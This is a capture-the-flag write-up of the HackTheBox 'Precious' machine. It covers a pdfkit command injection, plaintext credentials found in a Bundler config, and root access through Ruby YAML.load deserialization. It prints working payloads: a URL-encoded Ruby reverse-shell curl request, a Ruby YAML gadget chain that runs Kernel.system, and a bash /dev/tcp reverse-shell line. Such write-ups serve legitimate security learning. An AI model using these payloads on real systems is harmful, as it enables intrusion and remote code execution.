Breaking in before the VPN broke down - A Journey through Precious (HTB Writeup)

Posted on Aug 6, 2025 9 mins

Hackthebox Pdfkit Ruby Yaml Deserialization Command-Injection Reverse-Shell Linux Privilege Escalation Vpn Troubleshooting

Table of Contents

Hey folks, hope you’re doing great. This was my second box of the week: Precious .

It’s listed as an Easy Linux box - and while the user flag came quickly, the root part had some twists. To make things more exciting, my VPN started dying halfway through. More on that later.

I picked this one because of the consistently “Easy” ratings on HTB. That usually means solid fundamentals and a chance to practice clean enumeration and exploitation.

Enumeration

I started with a basic top 2000 ports scan:

nmap --top-ports 2000 -sV -sC -sS 10.129.228.98

Result:

...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian
80/tcp open  http    nginx 1.18.0 + Phusion Passenger 6.0.15
...

Two services: SSH and a web server running Nginx with Phusion Passenger. As always, I added the hostname for easier access:

echo "10.129.228.98 precious.htb" >> /etc/hosts

Browsing to http://precious.htb gave me a simple webpage with a PDF converter form.

Converting Webpages to PDF

The interface let you enter a URL, and it would supposedly convert the content at that URL into a PDF.

First test: I submitted the German Wikipedia homepage:

https://de.wikipedia.org/wiki/Wikipedia:Hauptseite

The result was an error - the converter couldn’t load the remote URL. I tried a few others, including direct PDF links, but the issue persisted.

This likely meant the service was running in an isolated network environment or using a restrictive configuration that prevented outbound requests.

Inspection with Burp

I captured the request with Burp Suite. The submitted URL appeared in a standard form field:

Seeing the raw parameter sparked the wrong idea at first: I assumed I could manipulate the input to perform some kind of injection - maybe abusing special URL characters or parameters.

I tried to conceal a payload using techniques from this PortSwigger article , such as encoding command injections into the username/password fields of a URL, but none of that worked.

Payloads I tried out here

Even though that didn’t pay off here, it’s still a valuable technique worth exploring in future scenarios.

When the VPN Died

At this point, my VPN started acting up. The connection dropped repeatedly. I tried restarting the VPN client multiple times, and when that failed, I switched to using HTB’s Pwnbox - which, thankfully, was more stable.

Since the server couldn’t reach the internet, I figured the only way to supply content would be to host it myself.

Hosting My Own HTTP Server

I spun up a local HTTP server with:

python -m http.server 8000

Then submitted a URL pointing to my own machine:

http://<MY_VM_IP>:8000

That worked. The application successfully downloaded the page and returned a PDF. Running pdfinfo on the downloaded file revealed something interesting:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


pdfinfo 9e5zp98apzbgq1kbql4tzmfkymyx7c7o.pdf 

Creator:         Generated by pdfkit v0.8.6
Custom Metadata: no
Metadata Stream: yes
Tagged:          no
UserProperties:  no
Suspects:        no
Form:            none
JavaScript:      no
Pages:           1
Encrypted:       no
Page size:       612 x 792 pts (letter)
Page rot:        0
File size:       30049 bytes
Optimized:       no
PDF version:     1.4

This confirmed that the backend was using pdfkit to generate the PDFs. pdfkit is a Python wrapper around wkhtmltopdf, which renders HTML to PDF using a headless browser engine.

Knowing the PDF was being generated via pdfkit opened up a path to command injection . The vulnerability is well-documented - pdfkit passes user-supplied URLs to wkhtmltopdf without sanitizing them, and it’s possible to inject shell commands through URL parameters.

Exploiting PDFKit Command Injection

I used an exploit based on this GitHub repo: shamo0/PDFkit-CMD-Injection .

The idea is to craft a URL that looks legitimate to the parser but contains a payload that gets executed by the shell when wkhtmltopdf runs it.

To receive the shell, I set up:

python -m http.server 8000     # to serve the malicious payload
nc -lvnp 4444                  # to catch the reverse shell

Then, I crafted a POST request to the target, pointing to my own HTTP server and embedding a reverse shell payload in the query string.

curl 'http://precious.htb/' -X POST \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'url=http%3A%2F%2F<MY_VM_IP>%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22<MY_VM_IP>%22%2C4444%29%29%27%60'

Payload Breakdown

Let’s unpack what’s going on inside that url= parameter. The critical part (once fully decoded) looks like this:

http://<MY_VM_IP>:8000/?name= ` ruby -rsocket -e 'spawn("sh",[:in,:out,:err]=>TCPSocket.new("<MY_VM_IP>",4444))' `

Step-by-step explanation:

1. parameter abuse

We’re sending a URL to the server’s PDF converter. But instead of a legitimate URL, we embed shell execution characters directly into it - specifically using backticks:

` ruby -rsocket -e '...' `

The backticks force shell execution when passed to a vulnerable system command - in this case, wkhtmltopdf, which pdfkit uses under the hood. If pdfkit blindly passes this string to a shell, the command inside the backticks gets executed.

2. Why Ruby?

Ruby is often preinstalled on Linux systems, and it allows one-liners for reverse shells using the socket library. We use -rsocket to load the library and -e to execute a Ruby expression.

3. The actual Ruby reverse shell:

spawn("sh", [:in, :out, :err] => TCPSocket.new("<MY_VM_IP>", 4444))

spawn("sh", ...) starts a shell process.
[:in, :out, :err] => TCPSocket.new(...) redirects the shell’s input, output, and error streams to a TCP socket.
TCPSocket.new("<MY_VM_IP>", 4444) connects back to our machine (the attacker’s machine), where we are listening with nc -lvnp 4444.

This gives us an interactive shell over TCP - a basic reverse shell.

4. Double URL encoding

Since the whole payload goes inside a URL parameter, it has to be URL-encoded. On top of that, some characters (like backticks and spaces) need to be double-encoded to survive the parsing process correctly and reach the command interpreter as intended.

Once submitted, and with the listener active, I received a callback:

Connection received on <MY_VM_IP>:4444

Boom, shell landed.

I had my shell - as the user running the web service (ruby).

Before we Escalate: Shell Stabilisation & Looking around

Looks like we’re inside as the ruby user. Time to stabilize and see what we can do.

First thought: check for sudo permissions.

ruby@precious:/home/henry$ sudo -l
We trust you have received the usual lecture from the local System Administrator...
[sudo] password for ruby:

No luck. No password, no privileges - at least not from this user.

Next step: poke around the user’s home directory.

ls -la /home/ruby

Among the usual .bashrc and .profile, one thing stood out:

dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle

.bundle is part of Ruby’s dependency management - used by Bundler to store gem configs.

Opening up the config:

cat /home/ruby/.bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

There it is - plaintext credentials for the henry user. Worth a shot:

su - henry
Password:
henry@precious:~$

We’re in.

Privilege Escalation

Now as henry, we can check sudo -l again.

sudo -l

Output:

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

That’s it. henry can execute a specific Ruby script as root without a password. That’s exactly the kind of vector we need.

Let’s inspect the file:

cat /opt/update_dependencies.rb

Here’s the script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29


require "yaml"
require 'rubygems'

def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }
        .map { |g| [g.name, g.version.to_s] }
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if file_name == local_name
            if file_version != local_version
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

Analyzing the Code

The script compares locally installed Ruby gems to a list specified in a dependencies.yml file. Critically, it uses this line:

YAML.load(File.read("dependencies.yml"))

This is insecure deserialization - YAML.load() is known to be dangerous when parsing untrusted input. If Ruby objects are defined in the YAML file, they’ll get instantiated and executed.

If we can write dependencies.yml in our current working directory, and the script uses YAML.load() unsafely, we can exploit this to trigger arbitrary code execution - as root.

Ruby YAML Deserialization to RCE

This class of vulnerability is well-documented, e.g., in elttam’s Ruby YAML blog post . It allows you to define complex Ruby object graphs in YAML that end up triggering system commands.

Based on this payload gist , I crafted a malicious dependencies.yml to force code execution:

cat > dependencies.yml

Paste in what you need as payload. E.g., i first had ls -la /root, and then:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

In short: we’re building a fake Ruby object structure that eventually calls Kernel.system("cat /root/root.txt").

Root Execution

Now, execute the script via sudo:

sudo ruby /opt/update_dependencies.rb

Output:

/root/root.txt
...
[stack trace noise]

Despite the stack trace, the command runs and we successfully read the root flag.

Key learning: in Ruby, YAML.load() is just as dangerous as Python’s pickle when handling untrusted input - and in HTB boxes, it pays to check every time a script loads external files or configs via load.

Want a full root shell? Just change git_set to something like:

git_set: bash -i >& /dev/tcp/10.10.14.153/4444 0>&1

and catch it with netcat.

Thoughts

This box was a ride - not just because of the PDF-to-reverse-shell vector, but because of how many moving pieces came together. From basic enumeration, to exploiting a lesser-known pdfkit command injection, to cracking open Ruby’s YAML deserialization quirks - this challenge forced me to pivot, learn fast, and adapt under pressure (literally, my VPN was falling apart mid-way through).

What I learned or reinforced:

Always check how external data is being parsed - especially with things like YAML.load() or anything passed into a PDF generation tool.
Ruby can be an incredibly flexible vector for both reverse shells and deserialization attacks - even if you’ve never used it before.
VPNs fail. Be ready to pivot to alternatives like Pwnbox or reconnect fast.

Advice to future players: Take the time to try different angles before peeking at hints or writeups. This box rewards exploration and a bit of lateral thinking.